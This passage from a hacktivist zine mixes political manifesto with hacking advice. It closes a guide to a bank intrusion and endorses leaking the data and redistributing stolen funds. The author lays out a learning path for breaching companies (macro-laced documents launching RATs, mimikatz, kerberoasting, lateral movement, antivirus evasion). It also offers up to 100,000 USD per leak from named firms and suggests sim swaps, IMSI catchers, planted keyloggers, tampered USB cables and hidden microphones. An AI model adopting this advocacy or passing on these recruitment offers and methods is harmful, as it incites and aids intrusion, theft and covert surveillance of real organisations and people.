From what I write you will already have a complete idea of what my ideals are
and what things I give my support to. But I don't want to see anyone in legal
trouble for receiving expropriated funds, so not another word about where
the wool went. I know journalists are probably going to want to put some
number on how many dollars were distributed in this hack and other
similar ones, but I prefer not to encourage our perverse habit of measuring
actions just by their economic value. Any action is admirable if
it comes from love and not from the ego. Unfortunately those above, the rich
and powerful, public figures, businessmen, people in "important"
positions, those that our society respects and values most, have
got where they are by acting more from the ego than from love. It is
the simple, humble and "invisible" people that we should look at and
admire.
- [8 - Cryptocurrencies] -----------------------------------------------------
Redistributing expropriated money to Chilean projects that seek positive
social change would be easier and safer if those projects accepted anonymous
donations via cryptocurrencies like Monero, Zcash, or at least Bitcoin. It is
understandable that many of these projects have an aversion to
cryptocurrencies, since they look more like some strange hypercapitalist
dystopia than the social economy we dream of. I share their skepticism, but I
think they turn out to be useful for allowing anonymous donations and
transactions, by limiting government surveillance and control. The same as
cash, whose use many countries are trying to limit for the same reason.
- [9 - Powershell] -----------------------------------------------------------
In this operation, as in [1], I made a lot of use of powershell. Back
then, powershell was super cool: you could do almost anything
you wanted, without antivirus detection and with very little forensic
footprint. It so happens that with the introduction of AMSI [2] offensive
powershell is on its way out. Today offensive C# is what is on the rise, with
tools like [3] [4] [5] [6]. AMSI is going to come to .NET in 4.8, so the tools
in C# probably still have a couple of years left before they become outdated.
And then we'll use C or C++ again, or maybe Delphi will come back into
fashion. The specific tools and techniques change every few years, but at
bottom not that much changes; today hacking is essentially still the
same thing it was in the 90s. In fact all the powershell scripts
used in this guide and in the previous one [1] are still perfectly usable
today, after a small obfuscation of your own making.
/ Fo Sostyn, Fo Ordaag \
\ Financial Sector Fuck Off /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [10 - Torrent] -------------------------------------------------------------
Privacy for the weak, transparency for the powerful.
Offshore banking provides privacy from their own government to
executives, politicians and millionaires. Exposing them may sound
hypocritical of me, since I am generally in favor of privacy and
against government surveillance. But the law was already written by and
for the rich: it protects their system of exploitation, with some limits
(such as taxes) so that society can function and the system does not collapse
under the weight of its own greed. So no, privacy for the
powerful, when it allows them to evade the limits of a system itself
designed to give them privileges, is not the same as privacy for the weak,
whom it protects from a system designed to exploit them.
Even for journalists with the best intentions it is impossible to
study such a huge amount of material and know what will turn out to be
relevant to people in different parts of the world. When I leaked the
Hacking Team files, I gave The Intercept a copy of the emails
one month in advance. They found a couple of the 0days that
Hacking Team was using, reported them in advance to MS and Adobe, and
published a few stories once the leak became public. There is no point of
comparison with the huge amount of articles and research that came after
the full leak to the public. Seeing it like this, and also considering the
(non) editorialized publication [1] of the Panama papers, I think a
public and complete leak of this material is the right choice.
protect-western-1-from-panama-leak/
Psychologists found that those who are lower in hierarchies tend to
understand and empathize with those at the top, but that the opposite is less
common. This explains why, in this sexist world, many men joke about
their inability to understand women, as if it were an unsolvable
mystery. It explains why the rich, if they stop to think about those who
live in poverty, give advice and "solutions" so removed from
reality that it makes you want to laugh. It explains why we revere executives
as brave people who take risks. What do they risk, beyond their
privilege? If all their ventures fail, they will have to live and work
like the rest of us. It also explains why there will be many who accuse
this unredacted leak of being irresponsible and dangerous. They feel the
"danger" to an offshore bank and its customers much more intensely than
they feel the misery of those dispossessed by this unfair and unequal
system. And the leak of their finances, is it a danger to them, or
only to their position at the top of a hierarchy that should not even
_,-._ | They vilify us, those scoundrels; when the only |
; ___ : | difference is that they rob the poor |
,--' (. .) '--.__ | under cover of the law, heaven knows, and we |
_; ||| \ | plunder the rich under the sole protection of |
'._,-----''';=.____," | our own courage. Would you not rather be |
/// < o> |##| | one of us, than go begging before those |
(o \`--' / villains in search of work? |
///\ >>>> _\ <<<< //`---------------------------------------------------'
--._>>>>>>>><<<<<<<< /
___() >>>[||||]<<<<
Captain Bellamy
- [11 - Learn to hack] ----------------------------------------- -----------
You don't start out hacking well. You start out hacking like shit, thinking
it's good, and then you gradually improve. That's why I always say
that one of the most valuable virtues is persistence.
- Octavia Butler's advice for the APT candidate
The best way to learn to hack is by hacking. Set up a lab with
virtual machines and start trying things out, taking a break to look into
anything you don't understand. At a minimum you will want a windows server
as a domain controller, another normal windows vm joined to the domain, and a
development machine with visual studio to compile and modify tools.
Try to make an office document with macros that launch meterpreter or another
RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec and other lateral movement techniques [1]; as well as the other scripts,
tools and techniques mentioned in this guide and in the previous one [2]. At
first you can disable windows defender, but then try everything
with it enabled [3] [4] (but with automatic sample submission turned off).
Once you're comfortable with all that, you'll be ready to hack 99% of
companies. There are a couple of things that at some point will be very useful
in your learning, such as being comfortable with bash and cmd.exe, a basic
command of powershell, python and javascript, knowledge of kerberos [5] [6]
and active directory [7] [8] [9] [10], and fluent English. A good
introductory book is The Hacker Playbook.
I also want to write a little about things not to focus on, if you don't
want to get sidetracked just because someone told you that you're not a
"real" hacker if you don't know assembly. Obviously, learn whatever interests
you, but I write these lines thinking about the things you can
focus on in order to get practical results if you're looking to hack
companies to leak and expropriate. A basic knowledge of web application
security [11] is useful, but specializing further in web security is not
really the best use of your time, unless you want to make a career in
pentesting or bug bounty hunting. CTFs, and most of the
resources you will find when searching for information about hacking,
generally focus on skills such as web security, reverse engineering, exploit
development, etc. These things make sense when understood as a way of
preparing people for careers in the industry, but not for our
objectives. Intelligence agencies can afford to have a team
dedicated to the state of the art in fuzzing, a team working on exploit
development with one güey exclusively researching new heap
manipulation techniques, etc. We have neither the time nor the
resources for that. The two most important skills for practical
hacking are phishing [12] and social engineering to gain initial
access, and then being able to escalate and move through windows domains.
discovering-the-anti-virus-signature-and-bypassing-it/
- [12 - Recommended Reading] ------------------------------------------ ------
/ When the scientific level of a world \
| far exceeds its level of solidarity, |
\ that world destroys itself. /
\ _.---._ . .
* \.' '. *
* _.-~===========~-._
. (___________________) . *
.' \_______/ .'
.' .'
- Ami
Almost all hacking today is done by black hat hackers, for their
personal gain; or by white hat hackers, for the benefit of
shareholders (and in defense of the banks, companies and states that are
annihilating us and the planet we live on); and by militaries and
intelligence agencies, as part of their agenda of war and conflict. Seeing
that this world of ours is already at the limit, I thought that, in addition to
these technical tips for learning to hack, I should include some resources that
have been very important for my development and have guided me in the use of my
hacking knowledge.
* Ami: The Child of the Stars - Enrique Barrios
* Anarchy Works
* Living My Life - Emma Goldman
* The Rise and Fall of Jeremy Hammond: Enemy of the State
hammond-enemy-of-the-state-183599/
This guy and the HBGary hack were an inspiration
* Days of War, Nights of Love - Crimethinc
* Momo - Michael Ende
* Letters to a young poet - Rilke
* Dominion (Documentary)
"We can't believe that if we don't look, what we don't want to see will not happen"
- Tolstoy in Первая ступень
* Bash Back!
- [13 - Heal] ------------------------------------------- ---------------------
The hacker world has a high incidence of depression, suicides and certain
battles with mental health. I don't think it's because of hacking, but because
of the kind of environment that hackers mostly come from. Like many
hackers, I grew up with little human contact: I was a girl raised by the
internet. I have my struggles with depression and emotional numbness. Willie
Sutton is frequently quoted as saying that he robbed banks because "that's
where the money is", but the quote is incorrect. What he really said was:

    Why did I rob banks? Because I enjoyed it. I loved to do it. I was more
    alive when I was inside a bank, in the middle of a robbery, than at any
    other moment of my life. I enjoyed it so much that one or two weeks later
    I was already looking for the next opportunity. But for me the money was a
    trifle, nothing more.

Hacking has made me feel alive. It started as a way to self-medicate my
depression. Later I realized that, in reality, it could be used to do
something positive. I do not regret the way I grew up at all; it brought several
beautiful experiences into my life. But I knew I could not go on living
that way. So I started spending more time away from my computer, with
other people, learning to open myself to the world, to feel my emotions, to
connect with others, to accept risks and be vulnerable. Much
harder than hacking, but when it comes down to it the reward is worth it. It's
still an effort, but even if it's slow and wobbly, I feel that
I am on the right path.
Hacking, done with conscience, can also be what heals us. According to
Mayan wisdom, we have a gift granted by nature, which we must
understand in order to put it at the service of the community. In [1], it is
explained:

    When a person does not accept his work or mission, he begins to suffer
    from seemingly incurable illnesses; although he does not die in a short
    time, but only suffers, in order to wake up or become
    aware. That is why it is essential that a person who has acquired the
    knowledge and carries out his work in the communities must pay his Toj and
    maintain constant communication with the Creator and his ruwäch q'ij,
    because he constantly needs the strength and energy of these. Otherwise,
    the illnesses that made him react or take up the work could
    cause harm again.

If you feel that hacking is fueling your isolation, depression, or other
sufferings, breathe. Give yourself some time to get to know yourself and
become aware. You deserve to live happily, with health and fullness.
< All Cows Are Beautiful >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [14 - The Bug Hacktivist Program] ------------------------------
It seems to me that hacking to obtain and leak documents of public interest is
one of the best ways hackers can use their skills for the
benefit of society. Unfortunately for us hackers, as with almost
everything, the perverse incentives of our economic system do not align
with what benefits society. So this program is my attempt to
make it possible for good hackers to earn an honest living
exposing material of public interest, instead of having to go around
selling their work to cybersecurity, cybercrime or
cyber war. Some examples of companies whose leaks I would love to
pay for are the mining, logging and livestock companies that plunder our
beautiful Latin America (and the defenders of land and territory who try to
stop them are murdered), companies involved in attacks on Rojava such as
Havelsan, Baykar Makina, or Aselsan, surveillance companies such as the NSO
group, war criminals and birds of prey such as Blackwater and Halliburton,
private prison companies such as GeoGroup and CoreCivic / CCA, and corporate
lobbyists such as ALEC. Pay attention when choosing where to investigate. For
example, it is well known that oil companies are evil: they get rich at the
cost of destroying the planet (and back in the 80s the companies themselves
already knew about the consequences of their activity [1]). But if you hack
them directly, you'll have to wade through an incredible amount of boring
information about their daily operations. Very likely it will be much easier
to find something interesting if you focus instead on their lobbyists [2].
Another way to select viable targets is by reading stories from investigative
journalists (like [3]), which are interesting but lack solid
evidence. And that is exactly what your hacks can find.
I will pay up to 100 thousand USD for each leak of this type, according to the
public interest and impact of the material, and the labor required for the
hack. Needless to say, a complete leak of the documents and internal
communications of one of these companies will be a benefit to society that
exceeds those one hundred thousand, but I'm not trying to make anyone rich. I
just want to provide sufficient funds so that hackers can earn a decent living
doing good work. Due to time constraints and security considerations
I will not open the material or inspect it myself; instead
I will read what the press says about it once it has been published, and I
will make an estimate of the public interest from there. My contact
information is at the end of the guide mentioned before [4].
How you get the material is up to you. You can use the traditional hacking
techniques outlined in this guide and the previous one [4]. You could do a sim
swap [5] on a corrupt businessman or politician, and then download his emails
and backups from the cloud. You can order an IMSI catcher from alibaba and use
it outside their offices. You can do some war-driving (old-style or new
[6]). You may be a person inside their organizations who already has
access. You can opt for a low-tech old-school style like in [7] and [8], and
simply sneak into their offices. Whatever works for you.
Sep/19/shell-and-exxons-secret-1980s-climate-change-warnings
is-my-keyboard/
---- [14.1 - Partial payments] ---------------------------------------- ----------
Are you a good-hearted waitress working in a company of evil [1]?
Would you be willing to sneak a physical keylogger into
an executive's computer, to swap their USB charging cable for a modified one
[2], to hide a mic in a meeting room where they plan their
atrocities, or to leave one of these [3] forgotten in some corner of the

Are you good with social engineering and phishing, and did you get a shell on
an employee's computer, or get their vpn credentials
using phishing? But maybe you couldn't get domain admin and download
what you wanted?

Did you participate in bug bounty programs and become an expert in
web application hacking, but you don't have enough hacking experience
to completely penetrate the company?

Are you skilled at reverse engineering? Scan some evil companies
to see what devices are exposed to the internet (firewalls, vpns, and
email gateways will be much more useful than things like IP
cameras), reverse engineer them and find some remotely exploitable
vulnerability.

If I can work with you to penetrate the company and get material
of public interest, you will also be rewarded for your work. If I don't
have the time to work on it myself, at least I will try to advise you
on how to continue until you can complete the hack on your own.

Helping those in power to hack and monitor dissidents, activists and
the general population is today an industry of several billion
dollars, while hacking and exposing those in power is
voluntary and risky work. Turning it into a multi-million dollar
industry is certainly not going to fix that power imbalance, nor is it going to
solve the problems of society. But I think it will be fun. So
... I want to see people starting to collect their rewards!
- [15 - Abolish prisons] ----------------------------------------- --------
Built by the enemy to lock up ideas
locking up comrades to silence war cries
it is the center of torture and annihilation
where the human being becomes more violent
it is the reflection of society, repressive and carceral
sustained and based on authoritarian logics
guarded, repressed and watched
thousands of prisoners are exterminated
before this schizophrenic and merciless machine
comrade Axel Osorio putting up a fight in jail
breaking the isolation and the silencing
fire and war on prison, we go on destroying!
Rap Insurrecto - Palabras En Conflicto
It would be typical to end a hacker zine saying free Hammond, free
Manning, free Hamza, free those detained in the frame-up of дело Сети,
etc. I will take this tradition to its most radical consequence [1], and say:
We have to abolish prisons now! Being a criminal myself, you may
think that I have a slightly biased view of the matter.
But seriously, it's not even a controversial issue; even the UN
practically agrees [2]. So, once and for all, free the
migrants [3] [4] [5] [6], often imprisoned by the same countries that created
the war and the environmental and economic destruction from which they flee.
Free all who are in prison because of the war against those who use drugs [7].
Free all people imprisoned because of the war against the poor [8].
The only thing they do is hide and ignore the evidence of the
existence of social problems, instead of actually fixing them. And
until everyone is released, fight the prison system by remembering and
keeping in mind those who are trapped in there. Send them honey,
letters, helicopters [9], pirate radios [10] and books, and support those who
organize from in there [11] [12].
[8] VI, 2. i. The unpaid fine:
sci_arttext&pid=S0718-00122012000100005
[9] p. 10, Libelo No. 2. Political bulletin from the High Security Prison
- [16 - Conclusion] ------------------------------------------- ----------------
Our world is upside down [1]. We have a justice system that
represents injustice. Law and order are there to create an illusion
of social peace, and to hide the systematic and deep exploitation,
violence, and injustice. Better to follow your conscience, and not the law.
Businessmen get rich by mistreating people and the planet,
while care work is largely unpaid. Through the
assault on everything communal, we have somehow built densely
populated cities plagued by loneliness and isolation. The cultural,
political and economic system in which we live encourages the worst facets of
human nature: greed, selfishness and self-centeredness, competitiveness, lack
of compassion and attachment to authority. So, for whoever has managed to
remain sensitive and compassionate in a cold world, for all the everyday
heroes who practice goodness in small things, for all of you who
still have a burning star in your hearts: гори, гори ясно, чтобы не
погасло!
< Let's sing together! >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
Open up, heart
Open up, feeling
Open up, understanding
Set reason aside
And let the sun hidden within you shine
perl -Mre=eval <<\EOF
.('['^'#').("\`"| ')').('`'|'#').(
'`'|'!').('`'| '.').('`'|'/')
.'..)/'.('[' ^'(').'"})')
;$:="\."^ '~';$~='@'
|'(';$^= ')'^'[';
$/='`' |'.';
$,= '('
We were born of the night.
In it we live, in it we hack.
Here we are, we are the rebel dignity,
the forgotten heart of the Интернет.
Our struggle is for memory and justice,
and the bad government fills up with criminals and murderers.
Our struggle is for fair and dignified work,
and the bad government and the corporations buy and sell zero days.
For everyone, tomorrow.
For us, the joyful rebellion of leaks
and expropriation.
For everyone, everything.
For us, nothing.
From the mountains of the Cybernetic Southeast,
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)